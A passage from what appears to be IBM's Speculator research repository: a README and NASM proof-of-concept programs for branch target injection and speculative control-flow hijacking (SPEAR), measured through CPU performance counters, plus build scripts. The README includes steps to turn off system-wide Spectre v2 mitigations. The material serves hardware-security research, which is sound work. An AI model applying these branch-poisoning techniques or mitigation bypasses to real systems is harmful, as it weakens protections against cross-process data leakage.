triggered by the indirect call should be redirected to one 21 | of the verify targets based on what was used in the attacker. Hence, the victim 22 | performance counters should show that one of the verify locations has been 23 | speculatively executed. 
24 | 25 | To compile and run the victim by itself: 26 | ``` 27 | ln -s $SPEC_H/examples/BTI/*.asm $SPEC_H/tests/ 28 | cmake $SPEC_H -B$SPEC_B -DCMAKE_BUILD_TYPE=Debug -DCMAKE_INSTALL_PREFIX=$SPEC_I -G "Ninja" 29 | ninja -C $SPEC_B install 30 | sudo $SPEC_I/speculator_mon -q -r 1000 -o $SPEC_I/results/speculator_output -v $SPEC_I/tests/bti_victim/bti_victim 31 | ``` 32 | The results always show no hits for the marker (assuming LD_BLOCKS.STORE_FORWARD is the 1st programmable counter specified, otherwise adjust -f X accordingly): 33 | ``` 34 | cat $SPEC_I/results/speculator_output | cut -d "|" -f 4| grep -v LD | sort | uniq -c 35 | ``` 36 | because no hijack is performed. 37 | 38 | If we re-run the test introducing the attacker process: 39 | ``` 40 | sudo $SPEC_I/speculator_mon -q -r 1000 -o $SPEC_I/results/speculator_output -v $SPEC_I/tests/bti_victim/bti_victim -a $SPEC_I/tests/bti_attacker/bti_attacker -s 41 | cat $SPEC_I/results/speculator_output | cut -d "|" -f 4| grep -v LD | sort | uniq -c 42 | ``` 43 | Based on the target selected at line 49 in `examples/BTI/bti_attacker.asm` (e.g. 44 | verify, verify2 and verify3) we should see 1, 3 or 6 markers being hit. 45 | The success rate really depends on the current settings of the machine (e.g. 46 | kernel version, security patches installed and enabled mitigations). 47 | 48 | On KabyLake i7-8650U we have results around ~950 successful hijacks out of 1000 49 | tries. 50 | 51 | ## Known problems 52 | BTI is very sensitive to various parameters which might drastically change the 53 | success rate of the injection. The following is a non-exhaustive list of them. 54 | 55 | ### History length 56 | To be able to poison a specific indirect call or jump, we need to make sure that 57 | the previous jump/call history sequence is the same between attacker and victim. 58 | The longer the matching sequence before the call/jump of interest between 59 | victim and attacker, the higher the chances of success. 
60 | 61 | If the attacker does not work, consider uncommenting the `jmpnext` macros 62 | in both attacker and victim. Those macros add a sequence of instructions that 63 | maximizes the POC's chances of success. 64 | 65 | ### Alignment 66 | To be able to perform BTI successfully, it is necessary that attacker and victim 67 | are perfectly aligned to be able to fool the CPU. To quickly check the correct 68 | alignment run: 69 | 70 | ``` 71 | objdump -D $SPEC_I/tests/bti_attacker/bti_attacker | egrep -e "(verify.*|call)>:" 72 | objdump -D $SPEC_I/tests/bti_victim/bti_victim | egrep -e "(verify.*|call)>:" 73 | ``` 74 | Across the two outputs, the same label should have the same address in each 75 | output. 76 | 77 | ### Are BTI mitigations enabled? 78 | This test would not provide successful results on machines that have mitigations 79 | enforced. To verify the status of the machine mitigations check: 80 | 81 | ``` 82 | cat /sys/devices/system/cpu/vulnerabilities/spectre_v2 83 | ``` 84 | 85 | If STIBP is forced then the attack would not work. 86 | It will be necessary to add `nospectre_v2` to `GRUB_CMDLINE_LINUX_DEFAULT` in `/etc/default/grub` 87 | and then run: 88 | 89 | ``` 90 | sudo update-grub && reboot 91 | ``` 92 | to effectively disable such mitigation. `nospectre_v2` turns off every Spectre v2 mitigation for the whole system, not only STIBP, so use a dedicated test machine and remove the parameter (then run `update-grub` again) once the measurements are done. 93 | 94 | In case the mitigation is marked as conditional, it should not affect the tests 95 | since they neither use prctl to enable the mitigation nor use SECCOMP which 96 | would trigger STIBP when activated. 97 | 98 | ### Kernel version 99 | For some reason the same CPU with different kernel versions (which have the same 100 | mitigation settings) has a different success rate. We attribute this different behavior to 101 | the scheduler decisions. 
To tune the attack you can play with the following 102 | Speculator options: 103 | 104 | `-s` which forces serialization between attacker and victim (victim is started when 105 | attacker has finished its execution) 106 | 107 | `-d` adds delay between the start of victim and the attacker in nanoseconds (note 108 | that a big delay is known to degrade the signal so do not push it 109 | too far :) ) 110 | 111 | ### Is the attacker running in the right co-located thread? 112 | One possible reason for this attack not to be working is that the machine does 113 | not have SMT enabled and/or the attacker process is not running on a co-located 114 | thread compared to the victim. Speculator default value for the co-located 115 | thread is 5 since most of our cpus have 4 cores/8 threads but each CPU/OS pair enumerates differently. 116 | 117 | Check the output of: 118 | ``` 119 | cat /proc/cpuinfo | egrep -e "(processor|core id)" 120 | ``` 121 | to identify the right co-located thread. 122 | Once you have identified the processor number, you can simply re-run cmake with 123 | `-DATTACKER=X` to propagate this piece of information. 
124 | 125 | For instance: 126 | 127 | ``` 128 | cmake $SPEC_H -B$SPEC_B -DCMAKE_BUILD_TYPE=Debug -DCMAKE_INSTALL_PREFIX=$SPEC_I -G "Ninja" -DATTACKER=5 129 | ``` 130 | -------------------------------------------------------------------------------- /examples/BTI/bti_attacker.asm: -------------------------------------------------------------------------------- 1 | [BITS 64] 2 | %include "common.inc" 3 | %include "pmc.inc" 4 | 5 | section .data 6 | 7 | dev_file: db '/dev/cpu/',ATTACKER_PROCESS_STR,'/msr',0 8 | iteration: dq 1 9 | fd: dq 0 10 | val: dq 0 11 | len: equ $-val 12 | array: times 2048 db 0 13 | addr: dq 0 14 | align 1024 15 | ;##### DATA STARTS HERE ######## 16 | 17 | ;##### DATA ENDS HERE ######## 18 | 19 | section .text 20 | global perf_test_entry:function 21 | 22 | ; INDIRECT CALL TRAINED BY ATTACKER 23 | bti_call: 24 | call [addr] 25 | ret 26 | 27 | perf_test_entry: 28 | push rbp 29 | mov rbp, rsp 30 | sub rsp, 0 31 | check_pinning ATTACKER_PROCESS 32 | msr_open 33 | msr_seek 34 | mov QWORD[iteration], 1 35 | align 512 36 | 37 | attacker: 38 | ; Train code for BTI 39 | .train: 40 | ;jmpnext256 41 | ;jmpnext256 42 | mov QWORD[addr], verify 43 | lfence 44 | 45 | reset_counter 46 | start_counter 47 | align 64 48 | .call: 49 | call bti_call 50 | stop_counter 51 | 52 | dec QWORD[iteration] 53 | cmp QWORD[iteration], 0 54 | jge .train 55 | .exit: 56 | msr_close 57 | exit 0 58 | 59 | align 1024 60 | verify: 61 | ret 62 | 63 | align 1024 64 | correct: 65 | ret 66 | 67 | align 1024 68 | verify2: 69 | ret 70 | 71 | fillerteststart: resb (0x1 << 14) 72 | align 1024 73 | verify3: 74 | ret 75 | -------------------------------------------------------------------------------- /examples/BTI/bti_victim.asm: -------------------------------------------------------------------------------- 1 | [BITS 64] 2 | %include "common.inc" 3 | %include "pmc.inc" 4 | 5 | section .data 6 | 7 | dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0 8 | fd: dq 0 9 | val: dq 0 10 | len: 
equ $-val 11 | array: times 2048 db 0 12 | addr: dq 0 13 | align 1024 14 | ;##### DATA STARTS HERE ######## 15 | 16 | ;##### DATA ENDS HERE ######## 17 | 18 | section .text 19 | global perf_test_entry:function 20 | 21 | ; HIJACKED CALLED IN THE VICTIM 22 | bti_call: 23 | call [addr] 24 | ret 25 | 26 | perf_test_entry: 27 | push rbp 28 | mov rbp, rsp 29 | sub rsp, 0 30 | check_pinning VICTIM_PROCESS 31 | msr_open 32 | msr_seek 33 | 34 | align 512 35 | 36 | victim: 37 | ;jmpnext256 38 | ;jmpnext256 39 | mov QWORD[addr], correct 40 | clflush[addr] 41 | lfence 42 | 43 | reset_counter 44 | start_counter 45 | align 64 46 | .call: 47 | call bti_call 48 | 49 | stop_counter 50 | 51 | msr_close 52 | exit 0 53 | 54 | lfence 55 | align 1024 56 | verify: 57 | ; 1 LD_BLOCK.STORE_FORWARD markers 58 | mov DWORD[array], eax 59 | mov DWORD[array+4], edx 60 | movq xmm0, QWORD[array] 61 | lfence 62 | ret 63 | 64 | align 1024 65 | correct: 66 | lfence 67 | ret 68 | 69 | align 1024 70 | verify2: 71 | ; 3 LD_BLOCK.STORE_FORWARD markers 72 | mov DWORD[array], eax 73 | mov DWORD[array+4], edx 74 | movq xmm0, QWORD[array] 75 | 76 | mov DWORD[array], eax 77 | mov DWORD[array+4], edx 78 | movq xmm0, QWORD[array] 79 | 80 | mov DWORD[array], eax 81 | mov DWORD[array+4], edx 82 | movq xmm0, QWORD[array] 83 | lfence 84 | ret 85 | 86 | 87 | fillerteststart: resb (0x1 << 14) 88 | align 1024 89 | verify3: 90 | ; 6 LD_BLOCK.STORE_FORWARD markers 91 | mov DWORD[array], eax 92 | mov DWORD[array+4], edx 93 | movq xmm0, QWORD[array] 94 | 95 | mov DWORD[array], eax 96 | mov DWORD[array+4], edx 97 | movq xmm0, QWORD[array] 98 | 99 | mov DWORD[array], eax 100 | mov DWORD[array+4], edx 101 | movq xmm0, QWORD[array] 102 | 103 | mov DWORD[array], eax 104 | mov DWORD[array+4], edx 105 | movq xmm0, QWORD[array] 106 | 107 | mov DWORD[array], eax 108 | mov DWORD[array+4], edx 109 | movq xmm0, QWORD[array] 110 | 111 | mov DWORD[array], eax 112 | mov DWORD[array+4], edx 113 | movq xmm0, QWORD[array] 114 | 115 | 
lfence 116 | ret 117 | -------------------------------------------------------------------------------- /examples/SPEAR/architectural/backward_edge/arch_bwd.asm: -------------------------------------------------------------------------------- 1 | ; Copyright 2021 IBM Corporation 2 | ; 3 | ; Licensed under the Apache License, Version 2.0 (the "License"); 4 | ; you may not use this file except in compliance with the License. 5 | ; You may obtain a copy of the License at 6 | ; 7 | ; http://www.apache.org/licenses/LICENSE-2.0 8 | ; 9 | ; Unless required by applicable law or agreed to in writing, software 10 | ; distributed under the License is distributed on an "AS IS" BASIS, 11 | ; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | ; See the License for the specific language governing permissions and 13 | ; limitations under the License. 14 | 15 | [BITS 64] 16 | %include "common.inc" 17 | %include "pmc.inc" 18 | 19 | section .data 20 | 21 | dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0 22 | ;dev_file: db '/dev/cpu/',ATTACKER_PROCESS_STR,'/msr',0 23 | fd: dq 0 24 | offset: dq 0 25 | val: dq 0 26 | len: equ $-val 27 | array: resb 128 28 | warmup_cnt: dd 11 29 | filler: resb 256 30 | stored_ret: dq 0 31 | filler2: resb 256 32 | counter: dq 0 33 | target: dq 0 34 | ;##### DATA STARTS HERE ######## 35 | 36 | ;##### DATA ENDS HERE ######## 37 | 38 | section .text 39 | global perf_test_entry:function 40 | global snippet:function 41 | 42 | perf_test_entry: 43 | push rbp 44 | mov rbp, rsp 45 | sub rsp, len 46 | 47 | check_pinning VICTIM_PROCESS 48 | ;check_pinning ATTACKER_PROCESS 49 | msr_open 50 | msr_seek 51 | 52 | start_counter 53 | mov QWORD[counter], 10 54 | mov QWORD[target], perf_test_entry.back 55 | .start: 56 | reset_counter 57 | call start 58 | .back: 59 | cmp QWORD[counter], 0 60 | jl .exit 61 | jg .skip 62 | 63 | mov QWORD[target], hijacked ; target for overwrite 64 | 65 | .skip: 66 | dec QWORD[counter] 67 | jmp .start 68 | .exit: 
69 | ret 70 | 71 | start: 72 | ; save old ret 73 | mov rax,[rsp] 74 | mov [stored_ret], rax 75 | 76 | ; architectural overwrite 77 | mov rax, [target] 78 | mov [rsp], rax 79 | 80 | ; evicting original value 81 | clflush [stored_ret] 82 | lfence 83 | 84 | ; check current value with original 85 | ; to see if overwrite has happened 86 | mov rax, [rsp] 87 | cmp rax, [stored_ret] 88 | jne my_exit 89 | 90 | ; return speculate with the arch overwritten value 91 | ret 92 | 93 | my_exit: 94 | stop_counter 95 | 96 | msr_close 97 | exit 0 98 | lfence 99 | 100 | hijacked: 101 | mov DWORD[array], eax 102 | mov DWORD[array+4], edx 103 | movq xmm0, QWORD[array] 104 | 105 | mov DWORD[array], eax 106 | mov DWORD[array+4], edx 107 | movq xmm0, QWORD[array] 108 | 109 | mov DWORD[array], eax 110 | mov DWORD[array+4], edx 111 | movq xmm0, QWORD[array] 112 | 113 | lfence 114 | ret 115 | -------------------------------------------------------------------------------- /examples/SPEAR/architectural/forward_edge/arch_fwd.asm: -------------------------------------------------------------------------------- 1 | ; Copyright 2021 IBM Corporation 2 | ; 3 | ; Licensed under the Apache License, Version 2.0 (the "License"); 4 | ; you may not use this file except in compliance with the License. 5 | ; You may obtain a copy of the License at 6 | ; 7 | ; http://www.apache.org/licenses/LICENSE-2.0 8 | ; 9 | ; Unless required by applicable law or agreed to in writing, software 10 | ; distributed under the License is distributed on an "AS IS" BASIS, 11 | ; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | ; See the License for the specific language governing permissions and 13 | ; limitations under the License. 
14 | 15 | [BITS 64] 16 | %include "common.inc" 17 | %include "pmc.inc" 18 | 19 | section .data 20 | 21 | dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0 22 | ;dev_file: db '/dev/cpu/',ATTACKER_PROCESS_STR,'/msr',0 23 | fd: dq 0 24 | offset: dq 0 25 | val: dq 0 26 | len: equ $-val 27 | array: resb 128 28 | warmup_cnt: dd 11 29 | filler: resb 256 30 | stored_target: dq 0 31 | filler2: resb 256 32 | counter: dq 0 33 | target: dq 0 34 | ;##### DATA STARTS HERE ######## 35 | 36 | ;##### DATA ENDS HERE ######## 37 | 38 | section .text 39 | global perf_test_entry:function 40 | global snippet:function 41 | 42 | perf_test_entry: 43 | push rbp 44 | mov rbp, rsp 45 | sub rsp, len 46 | 47 | check_pinning VICTIM_PROCESS 48 | ;check_pinning ATTACKER_PROCESS 49 | msr_open 50 | msr_seek 51 | 52 | reset_counter 53 | start_counter 54 | 55 | mov QWORD[counter], 10 56 | mov QWORD[target], correct 57 | mov QWORD[stored_target], correct 58 | .start: 59 | reset_counter 60 | ; Flush valued used for checking forward edge integrity 61 | clflush [stored_target] 62 | lfence 63 | ; Check if forward edge has been modified and fail if it is 64 | mov rax, QWORD[target] 65 | cmp rax, QWORD[stored_target] 66 | jne my_exit 67 | ; Perform the indirect call 68 | call QWORD[target] 69 | .back: 70 | cmp QWORD[counter], 0 71 | jl .exit 72 | jg .skip 73 | 74 | mov QWORD[target], hijacked 75 | .skip: 76 | dec QWORD[counter] 77 | jmp .start 78 | .exit: 79 | ret 80 | 81 | correct: 82 | lfence 83 | ret 84 | 85 | hijacked: 86 | mov DWORD[array], eax 87 | mov DWORD[array+4], edx 88 | movq xmm0, QWORD[array] 89 | 90 | mov DWORD[array], eax 91 | mov DWORD[array+4], edx 92 | movq xmm0, QWORD[array] 93 | 94 | mov DWORD[array], eax 95 | mov DWORD[array+4], edx 96 | movq xmm0, QWORD[array] 97 | 98 | hlt 99 | lfence 100 | ret 101 | 102 | my_exit: 103 | msr_close 104 | exit 0 105 | 106 | -------------------------------------------------------------------------------- /examples/SPEAR/link_spear.zsh: 
-------------------------------------------------------------------------------- 1 | #!/bin/zsh 2 | # Copyright 2021 IBM Corporation 3 | # 4 | # Licensed under the Apache License, Version 2.0 (the "License"); 5 | # you may not use this file except in compliance with the License. 6 | # You may obtain a copy of the License at 7 | # 8 | # http://www.apache.org/licenses/LICENSE-2.0 9 | # 10 | # Unless required by applicable law or agreed to in writing, software 11 | # distributed under the License is distributed on an "AS IS" BASIS, 12 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 13 | # See the License for the specific language governing permissions and 14 | # limitations under the License. 15 | 16 | 17 | ln -s $SPEC_H/examples/SPEAR/architectural/backward_edge/arch_bwd.asm $SPEC_H/tests 18 | ln -s $SPEC_H/examples/SPEAR/architectural/forward_edge/arch_fwd.asm $SPEC_H/tests 19 | ln -s $SPEC_H/examples/SPEAR/speculative/backward_edge/spec_bwd.asm $SPEC_H/tests 20 | ln -s $SPEC_H/examples/SPEAR/speculative/forward_edge/spec_fwd.asm $SPEC_H/tests 21 | -------------------------------------------------------------------------------- /examples/SPEAR/run_spear.zsh: -------------------------------------------------------------------------------- 1 | #!/bin/zsh 2 | # Copyright 2021 IBM Corporation 3 | # 4 | # Licensed under the Apache License, Version 2.0 (the "License"); 5 | # you may not use this file except in compliance with the License. 6 | # You may obtain a copy of the License at 7 | # 8 | # http://www.apache.org/licenses/LICENSE-2.0 9 | # 10 | # Unless required by applicable law or agreed to in writing, software 11 | # distributed under the License is distributed on an "AS IS" BASIS, 12 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 13 | # See the License for the specific language governing permissions and 14 | # limitations under the License. 
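# Build Speculator with -DCANARY=ON, run the four SPEAR examples under
# speculator_mon, and print a per-example summary of the results.
#
# Inputs (environment): SPEC_H, SPEC_B and SPEC_I. They are handed to cmake as
# the source directory, the -B build directory and CMAKE_INSTALL_PREFIX.
#
# Every speculator_mon invocation goes through sudo, so the path built from
# SPEC_I decides which binary runs as root. The checks below therefore reject
# empty values as well as unset ones: an empty SPEC_I would resolve the binary
# to /speculator_mon.

# Report the variable named $1 (whose value is passed as $2), or abort with a
# non-zero exit status when that value is empty or unset.
require_var() {
    if [[ -n "$2" ]]; then
        echo -e "\e[33m$1 is set to $2\e[39m"
    else
        echo -e "\e[31mERROR: $1 must be properly set\e[39m" >&2
        exit 1
    fi
}

require_var SPEC_I "${SPEC_I:-}"
require_var SPEC_H "${SPEC_H:-}"
require_var SPEC_B "${SPEC_B:-}"

# Stop on a failed configure or build, so the runs below never use whatever an
# earlier install left under $SPEC_I.
cmake "$SPEC_H" -B"$SPEC_B" -DCMAKE_BUILD_TYPE=Debug -DCMAKE_INSTALL_PREFIX="$SPEC_I" -G "Ninja" -DCANARY=ON || exit 1

ninja -C "$SPEC_B" install || exit 1

# Test names, in the order they are run and reported.
spear_tests=(arch_fwd arch_bwd spec_fwd spec_bwd)

# Heading printed above each test's summary.
typeset -A spear_titles
spear_titles=(
    arch_fwd "Architecture Forward Edge Overwrite"
    arch_bwd "Architecture Backward Edge Overwrite"
    spec_fwd "Speculative Forward Edge Overwrite"
    spec_bwd "Speculative Backward Edge Overwrite"
)

# A failing run is not fatal: the remaining tests still execute, as before.
for t in $spear_tests; do
    sudo "$SPEC_I/speculator_mon" -r1000 -v "$SPEC_I/tests/$t/$t" -o "$SPEC_I/results/$t" -c "$SPEC_I/speculator.json"
done

for t in $spear_tests; do
    echo -e "\e[33m${spear_titles[$t]} \e[39m"
    # Take the 4th "|"-separated field of every result row (assumes the marker
    # event is the first programmable counter in speculator.json; adjust -f
    # otherwise), drop the header rows containing "LD", and print
    # "<occurrences>-<value>" for the value 3 only. 3 presumably corresponds
    # to the three store/store/load sequences under each example's `hijacked`
    # label.
    cut -d "|" -f 4 "$SPEC_I/results/$t" | grep -v LD | sort | uniq -c | awk '{if ($2==3) printf "%d-%d\n", $1, $2}'
done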
-------------------------------------------------------------------------------- /examples/SPEAR/speculative/backward_edge/spec_bwd.asm: -------------------------------------------------------------------------------- 1 | ; Copyright 2021 IBM Corporation 2 | ; 3 | ; Licensed under the Apache License, Version 2.0 (the "License"); 4 | ; you may not use this file except in compliance with the License. 5 | ; You may obtain a copy of the License at 6 | ; 7 | ; http://www.apache.org/licenses/LICENSE-2.0 8 | ; 9 | ; Unless required by applicable law or agreed to in writing, software 10 | ; distributed under the License is distributed on an "AS IS" BASIS, 11 | ; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | ; See the License for the specific language governing permissions and 13 | ; limitations under the License. 14 | 15 | [BITS 64] 16 | %include "common.inc" 17 | %include "pmc.inc" 18 | 19 | section .data 20 | 21 | dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0 22 | ;dev_file: db '/dev/cpu/',ATTACKER_PROCESS_STR,'/msr',0 23 | fd: dq 0 24 | warmup_cnt_fake: dd 1 25 | offset: dq 0 26 | val: dq 0 27 | len: equ $-val 28 | array: resb 128 29 | warmup_cnt: dd 1 30 | filler: resb 256 31 | target: dq 0 32 | ;##### DATA STARTS HERE ######## 33 | 34 | ;##### DATA ENDS HERE ######## 35 | 36 | section .text 37 | global perf_test_entry:function 38 | global snippet:function 39 | global victim:function 40 | 41 | extern set_write_code 42 | 43 | perf_test_entry: 44 | push rbp 45 | mov rbp, rsp 46 | sub rsp, len 47 | 48 | mov QWORD[target], correct 49 | 50 | check_pinning VICTIM_PROCESS 51 | ;check_pinning ATTACKER_PROCESS 52 | msr_open 53 | msr_seek 54 | .data: 55 | clflush [warmup_cnt] 56 | mov eax, 0 57 | cpuid 58 | lfence 59 | reset_counter 60 | start_counter 61 | mov ebx, DWORD[warmup_cnt] 62 | cmp ebx, 12 63 | je .else 64 | ;##### SNIPPET STARTS HERE ###### 65 | call victim 66 | .back 67 | ;##### SNIPPET ENDS HERE ###### 68 | lfence 69 | .else: 
70 | lfence 71 | stop_counter 72 | 73 | inc DWORD[warmup_cnt] 74 | cmp DWORD[warmup_cnt], 12 75 | jl .again 76 | jg .skip 77 | mov QWORD[target], hijacked 78 | .again 79 | jmp .data 80 | .skip: 81 | msr_close 82 | exit 0 83 | 84 | victim: 85 | mov rax, QWORD[target] 86 | mov QWORD[rsp], rax 87 | ret 88 | lfence 89 | 90 | hijacked: 91 | mov DWORD[array], eax 92 | mov DWORD[array+4], edx 93 | movq xmm0, QWORD[array] 94 | 95 | mov DWORD[array], eax 96 | mov DWORD[array+4], edx 97 | movq xmm0, QWORD[array] 98 | 99 | mov DWORD[array], eax 100 | mov DWORD[array+4], edx 101 | movq xmm0, QWORD[array] 102 | 103 | 104 | lfence 105 | ret 106 | 107 | correct: 108 | jmp perf_test_entry.back 109 | ret 110 | -------------------------------------------------------------------------------- /examples/SPEAR/speculative/forward_edge/spec_fwd.asm: -------------------------------------------------------------------------------- 1 | ; Copyright 2021 IBM Corporation 2 | ; 3 | ; Licensed under the Apache License, Version 2.0 (the "License"); 4 | ; you may not use this file except in compliance with the License. 5 | ; You may obtain a copy of the License at 6 | ; 7 | ; http://www.apache.org/licenses/LICENSE-2.0 8 | ; 9 | ; Unless required by applicable law or agreed to in writing, software 10 | ; distributed under the License is distributed on an "AS IS" BASIS, 11 | ; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | ; See the License for the specific language governing permissions and 13 | ; limitations under the License. 
14 | 15 | [BITS 64] 16 | %include "common.inc" 17 | %include "pmc.inc" 18 | 19 | section .data 20 | 21 | dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0 22 | ;dev_file: db '/dev/cpu/',ATTACKER_PROCESS_STR,'/msr',0 23 | fd: dq 0 24 | warmup_cnt_fake: dd 1 25 | offset: dq 0 26 | val: dq 0 27 | len: equ $-val 28 | array: resb 128 29 | warmup_cnt: dd 1 30 | filler: resb 256 31 | target: dq 0 32 | ;##### DATA STARTS HERE ######## 33 | 34 | ;##### DATA ENDS HERE ######## 35 | 36 | section .text 37 | global perf_test_entry:function 38 | global snippet:function 39 | global victim:function 40 | 41 | perf_test_entry: 42 | push rbp 43 | mov rbp, rsp 44 | sub rsp, len 45 | 46 | check_pinning VICTIM_PROCESS 47 | ;check_pinning ATTACKER_PROCESS 48 | msr_open 49 | msr_seek 50 | mov QWORD[target], correct 51 | .data: 52 | clflush [warmup_cnt] 53 | mov eax, 0 54 | cpuid 55 | lfence 56 | reset_counter 57 | start_counter 58 | mov ebx, DWORD[warmup_cnt] 59 | cmp ebx, 12 60 | je .else 61 | ;##### SNIPPET STARTS HERE ###### 62 | call [target] 63 | ;##### SNIPPET ENDS HERE ###### 64 | lfence 65 | .else: 66 | lfence 67 | stop_counter 68 | 69 | inc DWORD[warmup_cnt] 70 | cmp DWORD[warmup_cnt], 12 71 | jl .again 72 | jg .skip 73 | mov QWORD[target], victim 74 | .again: 75 | jmp .data 76 | .skip: 77 | msr_close 78 | exit 0 79 | 80 | victim: 81 | mov QWORD[target], hijacked 82 | call QWORD[target] 83 | ret 84 | lfence 85 | 86 | hijacked: 87 | mov DWORD[array], eax 88 | mov DWORD[array+4], edx 89 | movq xmm0, QWORD[array] 90 | 91 | mov DWORD[array], eax 92 | mov DWORD[array+4], edx 93 | movq xmm0, QWORD[array] 94 | 95 | mov DWORD[array], eax 96 | mov DWORD[array+4], edx 97 | movq xmm0, QWORD[array] 98 | 99 | lfence 100 | ret 101 | 102 | correct: 103 | lfence 104 | ret 105 | -------------------------------------------------------------------------------- /examples/clflush_in_speculation/clflush_in_speculation_cached.asm: 
-------------------------------------------------------------------------------- 1 | ; Copyright 2021 IBM Corporation 2 | ; 3 | ; Licensed under the Apache License, Version 2.0 (the "License"); 4 | ; you may not use this file except in compliance with the License. 5 | ; You may obtain a copy of the License at 6 | ; 7 | ; http://www.apache.org/licenses/LICENSE-2.0 8 | ; 9 | ; Unless required by applicable law or agreed to in writing, software 10 | ; distributed under the License is distributed on an "AS IS" BASIS, 11 | ; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | ; See the License for the specific language governing permissions and 13 | ; limitations under the License. 14 | 15 | [BITS 64] 16 | %include "common.inc" 17 | %include "pmc.inc" 18 | 19 | section .data 20 | warmup_cnt: db 1 21 | fill: times 63 db 0 22 | 23 | warmup_cnt_fake: dw 2 24 | fill2: times 62 db 0 25 | 26 | junk: db 1 27 | fill3: times 63 db 0 28 | 29 | dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0 30 | fd: dq 0 31 | val: dq 0 32 | len: equ $-val 33 | lea_array: times 40 db 0 34 | ;##### DATA STARTS HERE ######## 35 | 36 | ;##### DATA ENDS HERE ######## 37 | 38 | section .text 39 | global perf_test_entry:function 40 | global snippet:function 41 | 42 | perf_test_entry: 43 | push rbp 44 | mov rbp, rsp 45 | sub rsp, len 46 | 47 | check_pinning VICTIM_PROCESS 48 | msr_open 49 | msr_seek 50 | .data: 51 | clflush [warmup_cnt] 52 | clflush [junk] 53 | lfence 54 | mov eax, DWORD[junk] 55 | lfence 56 | mov eax, 0 57 | cpuid 58 | lfence 59 | reset_counter 60 | start_counter 61 | mov ebx, DWORD[warmup_cnt] 62 | cmp ebx, 12 63 | je .else 64 | ;##### SNIPPET STARTS HERE ###### 65 | 66 | ;##### SNIPPET ENDS HERE ###### 67 | clflush [junk] 68 | ;lea rax, [lea_array+rax*2] 69 | lfence 70 | .else: 71 | mov eax, DWORD[junk] 72 | lfence 73 | stop_counter 74 | 75 | inc DWORD[warmup_cnt] 76 | cmp DWORD[warmup_cnt], 13 77 | jl .data 78 | 79 | msr_close 80 | exit 0 81 | 
-------------------------------------------------------------------------------- /examples/clflush_in_speculation/clflush_in_speculation_uncached.asm: -------------------------------------------------------------------------------- 1 | ; Copyright 2021 IBM Corporation 2 | ; 3 | ; Licensed under the Apache License, Version 2.0 (the "License"); 4 | ; you may not use this file except in compliance with the License. 5 | ; You may obtain a copy of the License at 6 | ; 7 | ; http://www.apache.org/licenses/LICENSE-2.0 8 | ; 9 | ; Unless required by applicable law or agreed to in writing, software 10 | ; distributed under the License is distributed on an "AS IS" BASIS, 11 | ; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | ; See the License for the specific language governing permissions and 13 | ; limitations under the License. 14 | 15 | [BITS 64] 16 | %include "common.inc" 17 | %include "pmc.inc" 18 | 19 | section .data 20 | warmup_cnt: db 1 21 | fill: times 63 db 0 22 | 23 | warmup_cnt_fake: dw 2 24 | fill2: times 62 db 0 25 | 26 | junk: db 1 27 | fill3: times 63 db 0 28 | 29 | dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0 30 | fd: dq 0 31 | val: dq 0 32 | len: equ $-val 33 | lea_array: times 40 db 0 34 | ;##### DATA STARTS HERE ######## 35 | 36 | ;##### DATA ENDS HERE ######## 37 | 38 | section .text 39 | global perf_test_entry:function 40 | global snippet:function 41 | 42 | perf_test_entry: 43 | push rbp 44 | mov rbp, rsp 45 | sub rsp, len 46 | 47 | check_pinning VICTIM_PROCESS 48 | msr_open 49 | msr_seek 50 | .data: 51 | clflush [warmup_cnt] 52 | clflush [junk] 53 | lfence 54 | mov eax, 0 55 | cpuid 56 | lfence 57 | reset_counter 58 | start_counter 59 | mov ebx, DWORD[warmup_cnt] 60 | cmp ebx, 12 61 | je .else 62 | ;##### SNIPPET STARTS HERE ###### 63 | 64 | ;##### SNIPPET ENDS HERE ###### 65 | clflush[junk] 66 | ;lea rax, [lea_array+rax*2] 67 | lfence 68 | .else: 69 | mov eax, DWORD[junk] 70 | lfence 71 | stop_counter 72 | 73 | 
inc DWORD[warmup_cnt] 74 | cmp DWORD[warmup_cnt], 13 75 | jl .data 76 | 77 | msr_close 78 | exit 0 79 | -------------------------------------------------------------------------------- /examples/corr_issued_and_exec/corr_issued_and_exec.json: -------------------------------------------------------------------------------- 1 | { 2 | "DATA": [ 3 | "something: dq 0", 4 | "something2: dq 0" 5 | ], 6 | 7 | "INST": [ 8 | "lea rax, [lea_array+rax*2]", 9 | "lea rax, [lea_array+rax*2]", 10 | "lea rax, [lea_array+rax*2]", 11 | "lea rax, [lea_array+rax*2]", 12 | "lea rax, [lea_array+rax*2]", 13 | "lea rax, [lea_array+rax*2]", 14 | "lea rax, [lea_array+rax*2]", 15 | "lea rax, [lea_array+rax*2]", 16 | "lea rax, [lea_array+rax*2]", 17 | "lea rax, [lea_array+rax*2]", 18 | "lea rax, [lea_array+rax*2]", 19 | "lea rax, [lea_array+rax*2]", 20 | "lea rax, [lea_array+rax*2]", 21 | "lea rax, [lea_array+rax*2]", 22 | "lea rax, [lea_array+rax*2]", 23 | "lea rax, [lea_array+rax*2]", 24 | "lea rax, [lea_array+rax*2]", 25 | "lea rax, [lea_array+rax*2]", 26 | "lea rax, [lea_array+rax*2]", 27 | "lea rax, [lea_array+rax*2]", 28 | "lea rax, [lea_array+rax*2]", 29 | "lea rax, [lea_array+rax*2]", 30 | "lea rax, [lea_array+rax*2]", 31 | "lea rax, [lea_array+rax*2]", 32 | "lea rax, [lea_array+rax*2]", 33 | "lea rax, [lea_array+rax*2]", 34 | "lea rax, [lea_array+rax*2]", 35 | "lea rax, [lea_array+rax*2]", 36 | 